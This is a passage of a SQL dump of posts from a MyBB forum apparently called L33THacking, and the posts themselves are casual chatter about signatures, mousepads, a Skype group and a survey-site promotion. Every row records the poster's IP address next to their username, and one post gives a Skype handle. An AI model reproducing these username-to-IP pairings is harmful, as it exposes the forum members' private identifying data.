'Probably going to make a nyan cat one, TY OP.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '97292de2a50277ff06d92b42599c4ff6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5105', '900', '5090', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '228', 'VirtualLegend', '1350488218', '[quote=\'iTzIpod\' pid=\'5090\' dateline=\'1350474941\'] Your avatar image is broken. Or, it\'s just me... [/quote] Your right his image is broken', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e8e23a743226c112b25ea6abf6e72bbe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5106', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '53', 'sirchamp', '1350488587', 'I also live in Europe. My skype = marco.phono1', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '7279b90acd6babb67f9835a4d02dc225', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5107', '919', '5104', '7', 'RE: [Free] Custom Mousepad - Only $1 with free shipping', '0', '264', 'D?ea', '1350489700', '[quote=\'NXK\' pid=\'5104\' dateline=\'1350487977\'] Probably going to make a nyan cat one, TY OP. [/quote] Could be awesome. Or a Gangnam Style - LOL. I got one with Anonymous ;) One with this picture: http://www.imgbase.info/images/safe-wallpapers/miscellaneous/qutote/15168_qutote_anonymous_i_am_free.jpg', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'd7260965734da2a7cf81b2cd9fa96c83', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5108', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '264', 'D?ea', '1350489756', 'NerdsLegend - please add me.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '785c18af59ed7edde4fcd5e8015afc02', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5109', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '264', 'D?ea', '1350489888', 'Can I get one please? It could be awesome if it had a bit of \'nerd\' style over it ;) -THANKS!', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '889ee253ed7fe96f5e0c8cf0f69b2a8b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5110', '900', '5008', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '228', 'VirtualLegend', '1350490871', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5008\' dateline=\'1350447588\'] yes please i would really like one thanks so much:) [/quote] Check your Inbox for your Signature [hr] [quote=\'D?ea\' pid=\'5109\' dateline=\'1350489888\'] Can I get one please? It could be awesome if it had a bit of \'nerd\' style over it ;) -THANKS! [/quote] I\'m Done with your Signature Check your Inbox', '83.83.167.183', '1397991351', '1', '0', '228', '1350493677', '1', 'ba2ff79ac54d86f68419acb404019837', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5111', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '222', 'Exposé', '1350494914', 'Ok I will add you......to the chat', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'b70c198d638448461b31a8e7625c1a94', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5112', '916', '5066', '3', 'RE: Subject too long', '0', '222', 'Exposé', '1350495126', 'Lol iv\'e never gotten that error. Why not just pick a subject that is shorter?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'ca4a2950db80cba113ced6b1d3a3658b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5113', '919', '5099', '7', 'RE: [Free] Custom Mousepad - Only $1 with free shipping', '0', '222', 'Exposé', '1350495167', 'Nice I should make a L33thacking one :P and give you guys em', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'cccb56c28e79d2f8d8e7b41da38564b3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5114', '915', '5043', '7', 'RE: PasteIT AIO - By ƒ???????????g', '0', '222', 'Exposé', '1350495568', 'Nice don\'t use it too much tho. Im integrating pastebin and pastie.org tonight when I get home', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '91966a7a3a63e3a27bfb8337df4ac478', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5115', '918', '5088', '65', 'RE: I feel famous', '0', '222', 'Exposé', '1350495806', 'Lol ok cool story bro.....nice vid :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '9860fcb80b61b09a0d00b8aba4ba463d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5116', '918', '5115', '65', 'RE: I feel famous', '0', '264', 'D?ea', '1350496013', '[quote=\'ƒ???????????g\' pid=\'5115\' dateline=\'1350495806\'] Lol ok cool story bro.....nice vid :P [/quote] Thanks man ;)', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '7e3871f9fb19f9388da4fa339570ba9f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5117', '919', '5113', '7', 'RE: [Free] Custom Mousepad - Only $1 with free shipping', '0', '264', 'D?ea', '1350496125', '[quote=\'ƒ???????????g\' pid=\'5113\' dateline=\'1350495167\'] Nice I should make a L33thacking one :P and give you guys em [/quote] If you pay, good idea! - haha.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '1320e5f46b1a02e8ccf6cc2db5c75f00', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5118', '920', '0', '49', '[IDEA] Award System', '12', '264', 'D?ea', '1350497366', '[align=center][b]I think we should get an award system here on L33THACKING.[/b] [i]Good idea or bad idea?[/i][/align]', '178.157.194.171', '-1298283861', '1', '0', '264', '1350497380', '1', 'dc9c876b3d5bca9e019f04a15e364189', '0', '1350497380'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5119', '920', '5118', '49', 'RE: [IDEA] Award System', '0', '61', 'NXK', '1350498489', 'We\'ve already had it, But it was causing bugs since it\'s outdated.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '5bde781a9a78d013a5d03936b13fd736', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5120', '921', '0', '4', 'Hey', '6', '270', 'LCS', '1350499559', 'Hello LH, VirtualLegend referred me so I thought I\'d give the forum ago. Looks pretty cool so far so I\'ll stay active, hope to meet some new people here and have some fun. Nice to meet you all:angel:', '2.124.223.31', '41738015', '0', '0', '0', '0', '1', 'f12ebe69f56d7d1adf6a3de7b42cd486', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5121', '922', '0', '9', '???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '270', 'LCS', '1350499669', '[align=center][url=https://efyu.net][img]http://www.efyu.net/signature/signature.png[/img][/url][/align] [b]On behalf[/b] of Myself & Narkose, I would love to introduce to you all [url=https://efyu.net]EFYU.net[/url] - the latest \'get-paid-to\' website. Our website is [b]100-hundred percent custom coded[/b], and is the most [b]secure network[/b] that offers our users protection [b](Full SSL Encryption)[/b] - guaranteed payments [b](Your earnings are safe!)[/b] and [b]the best paying offers[/b] on the whole web. [align=center][align=center][img]http://i.imgur.com/ALZA2.png[/img][/align][/align] [b]Contest:[/b] The first person to get 30 Active Referrals - (To count as active: they must have completed a minimum of 2 surveys) - will win $50 USD worth of vouchers. Start getting referrals now! The winner will be announced when someone hits that! [b]Please note:[/b] within the next week we expect to have over 1000+ worldwide surveys available to our users. Our current system/API allows us to add all CPA networks that we get accepted too. [u][b]Quick Links -[/b][/u] [list] [*][url=https://efyu.net/register.php]Register[/url] [*][url=https://efyu.net/faq.php]FAQ[/url] [*][url=https://efyu.net/voucher.php]Voucher Information[/url] [*][url=https://efyu.net/tos.php]Terms of Service[/url] [/list] [b][u]Main Features -[/u][/b] [list=1] [*]You\'ll get $0.20 free for registering. You\'ll only need to earn $2.80 (28 points) to cashout - it\'ll take 5 minutes to gain that many points. There are over 145 surveys available to US members. [*]You\'ll receive $0.10 each time you receive one of your referrals completes an offer. That\'s more than all of our competitors as of now. Our system will notify you via the dashboard on your number of referrals and how much your referrals have made you. [*]You\'ll receive free support. You can chat to a member of staff anytime via the dashboard - if we\'re online it\'ll tell you and you can request to have a live chat. You can also access complete 24/7 on our private forum - there\'s no need to register either, you\'ll automatically have an account created. Just login! [*]Everything\'s automatic - Complete a survey and you\'ll be credited your points within 60-seconds of completion - our API is fully functional and instant. You will be shown a \'Request Voucher\' button once you have earned 30 points ($3.00). [*]You can edit your account, password and emails. You can also use a different email than your main email to receive your vouchers. Oh, and we don\'t require our users to submit tedious tax forms to receive payments. [/list] [u][b]Signature(s) provided -[/b][/u] [img]http://www.efyu.net/signature/signature.png[/img] [code][url=http://www.efyu.net/?join=YourID][img]http://efyu.net/signature/signature.png[/img][/url][/code] [u][b]Live Support -[/b][/u] [url=http://efyu.kayako.com/visitor/index.php?/LiveChat/Chat/Request/_sessionID=ojgku63etquwp6v59e43p7mxf26xr8eo/_proactive=0/_filterDepartmentID=/_randomNumber=16/_fullName=/_email=/_promptType=chat]Click here to talk to an agent.[/url]', '2.124.223.31', '41738015', '0', '0', '0', '0', '1', '24b79b73effad136e630b2cd6676ebcc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5122', '921', '5120', '4', 'RE: Hey', '0', '228', 'VirtualLegend', '1350499684', 'Welcome To L33thacking LCS Stay Active and HQ', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '8f07da430618a8ca20ae6569ca2687bc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5123', '920', '5119', '49', 'RE: [IDEA] Award System', '0', '264', 'D?ea', '1350499697', '[quote=\'NXK\' pid=\'5119\' dateline=\'1350498489\'] We\'ve already had it, But it was causing bugs since it\'s outdated. [/quote] Just use the newest version?', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '63f2a4adb30afc1a8b4c11a49b3695b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5124', '920', '5118', '49', 'RE: [IDEA] Award System', '0', '228', 'VirtualLegend', '1350499834', 'It\'s a very GOOD idea !!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '782c1ad30d15d66ebc4ced6b9b4920b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5125', '921', '5120', '4', 'RE: Hey', '0', '264', 'D?ea', '1350499956', 'Welcome to our forum, remember to read the [url=http://l33thacking.net/misc.php?action=help]Help Desc[/url]', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '653015123498db65975072d7614d6b9a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5126', '921', '5120', '4', 'RE: Hey', '0', '222', 'Exposé', '1350499997', 'Welcome to LH broski. Hope you like the forum and stay active', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '63c4fe22729c05c3fa613a09c31ce03e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5127', '920', '5124', '49', 'RE: [IDEA] Award System', '0', '264', 'D?ea', '1350499999', '[quote=\'VirtualLegend\' pid=\'5124\' dateline=\'1350499834\'] It\'s a very GOOD idea !!! [/quote] Thanks mate.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'eb06d7ce918d177b39b7f4e70c0883b2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5128', '922', '5121', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '228', 'VirtualLegend', '1350500010', 'Nice thread I\'m gonna check it out for sure', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '36b4595d1193827bc0bd92c428b7bffb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5129', '897', '4897', '9', 'RE: YouTube SEO - Like a baws.', '0', '270', 'LCS', '1350500067', 'That\'s great, are you going to use the video to monetize?', '2.124.223.31', '41738015', '1', '0', '0', '0', '1', 'aaeca6ea827e0d8571b7a88de0c708bd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5130', '921', '5120', '4', 'RE: Hey', '0', '270', 'LCS', '1350500109', 'Thanks everyone, I\'ll be active, I like the forum haha.', '2.124.223.31', '41738015', '1', '0', '0', '0', '1', 'c69af879ee1ae555b35013e61245d98b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5131', '921', '5120', '4', 'RE: Hey', '0', '62', 'R?????zo?', '1350500156', 'Welcome to the community, stay active and HQ :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'eb85e1c49bca0b735e879757ff5d2c71', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5132', '897', '4897', '9', 'RE: YouTube SEO - Like a baws.', '0', '62', 'R?????zo?', '1350500192', 'Look pretty good bro, good job.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd1e40e31e576d5d2610c6168d8fc5fcd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5133', '920', '5118', '49', 'RE: [IDEA] Award System', '0', '62', 'R?????zo?', '1350500224', 'Yeah we had this and it was outdated, joker gave it a try but he could not fix it. Maybe someone else can :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '582764455b096a46ca6e9fd7e5bca319', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5134', '918', '5088', '65', 'RE: I feel famous', '0', '62', 'R?????zo?', '1350500255', 'I mean is it you jumping? :P Or just your channel.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '72abe799f0ebf75b744470f57054b1e4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5135', '916', '5112', '3', 'RE: Subject too long', '0', '62', 'R?????zo?', '1350500400', '[quote=\'ƒ???????????g\' pid=\'5112\' dateline=\'1350495126\'] Lol iv\'e never gotten that error. Why not just pick a subject that is shorter? [/quote] Is not that, it\'s when you try to reply you can\'t do it by .Quick reply. since you have to remove the \"RE: \" that is posted by default when you reply. just go here http://l33thacking.net/thread-839.html and try to reply and you will see :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'e98bb6c84e53f0eef6b7918bb8d71695', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5136', '922', '5128', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '270', 'LCS', '1350500428', '[quote=\'VirtualLegend\' pid=\'5128\' dateline=\'1350500010\'] Nice thread I\'m gonna check it out for sure [/quote] Thanks, it\'s a great website, you\'ll definately earn if you use it properly.', '2.124.223.31', '41738015', '1', '0', '0', '0', '1', 'f9d94c56cf5adfab44cdc9db3c490e3f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5137', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '62', 'R?????zo?', '1350500448', 'Look like I\'m already in :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '60a4e79cf4a9c1ea164d65cadcd5a359', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5138', '920', '5133', '49', 'RE: [IDEA] Award System', '0', '264', 'D?ea', '1350500490', '[quote=\'R?????zo?\' pid=\'5133\' dateline=\'1350500224\'] Yeah we had this and it was outdated, joker gave it a try but he could not fix it. Maybe someone else can :) [/quote] I can fix it, if I gets a chance ;)', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'a969113a527ae5a23434665af5b74a06', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5139', '922', '5121', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '62', 'R?????zo?', '1350500540', 'Look promising. I\'m not in US though, will this work if I have a VPN? Nice thread anyways.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c4c85e30c2a441fd90189f9e79de4ce2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5140', '897', '5132', '9', 'RE: YouTube SEO - Like a baws.', '0', '264', 'D?ea', '1350500543', '[quote=\'LCS\' pid=\'5129\' dateline=\'1350500067\'] That\'s great, are you going to use the video to monetize? [/quote] Yes I am, I makes $$$ on it. [quote=\'R?????zo?\' pid=\'5132\' dateline=\'1350500192\'] Look pretty good bro, good job. [/quote] Thanks.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'c9628c0940238d79c234ab8831446935', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5141', '918', '5134', '65', 'RE: I feel famous', '0', '264', 'D?ea', '1350500606', '[quote=\'R?????zo?\' pid=\'5134\' dateline=\'1350500255\'] I mean is it you jumping? :P Or just your channel. [/quote] It\'s \"just\", mine channel.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '756064c317ed1bd5055ef2c9882ae980', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5142', '919', '5099', '7', 'RE: [Free] Custom Mousepad - Only $1 with free shipping', '0', '62', 'R?????zo?', '1350500607', 'That looks cool, do they ship worldwide? Any one knows?', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1c5af21cce53eb21708d15d4db46a87c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5143', '919', '5142', '7', 'RE: [Free] Custom Mousepad - Only $1 with free shipping', '0', '264', 'D?ea', '1350500667', '[quote=\'R?????zo?\' pid=\'5142\' dateline=\'1350500607\'] That looks cool, do they ship worldwide? Any one knows? [/quote] Yes they do. They send by Regular Airmail.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '02f78ec19d4bf4087fe2c8c6e6008432', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5144', '918', '5088', '65', 'RE: I feel famous', '0', '62', 'R?????zo?', '1350500696', 'Yeah sorry I don\'t know who Felix Baumgartner is, I\'m not into that :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '8cd7d332a83601852c3162e1a9c977c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5145', '897', '4897', '9', 'RE: YouTube SEO - Like a baws.', '0', '62', 'R?????zo?', '1350500726', 'How much are you making a month by the way? Just curious.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'b761f6baf362811e643e83390abb8fbc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5146', '918', '5144', '65', 'RE: I feel famous', '0', '264', 'D?ea', '1350500740', '[quote=\'R?????zo?\' pid=\'5144\' dateline=\'1350500696\'] Yeah sorry I don\'t know who Felix Baumgartner is, I\'m not into that :P [/quote] He have been in the news every day the last week almost.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'edacc9b1e3af280b81f9fce9cee4f43e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5147', '920', '5118', '49', 'RE: [IDEA] Award System', '0', '62', 'R?????zo?', '1350500756', 'Talk to t3h jok3r, I\'d love my GFX award :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '19a3e514ba57a46921bc35ea6eb17632', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5148', '915', '5043', '7', 'RE: PasteIT AIO - By ƒ???????????g', '0', '62', 'R?????zo?', '1350500796', 'Cool, I will wait for that version then. I will use it once in a while don\'t worry. Hopefully we get more members :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '95035a414c676d51d57d74fe42f901db', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5149', '918', '5088', '65', 'RE: I feel famous', '0', '62', 'R?????zo?', '1350500837', 'Yeah but I don\'t watch that much televison also I\'m not from the US.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 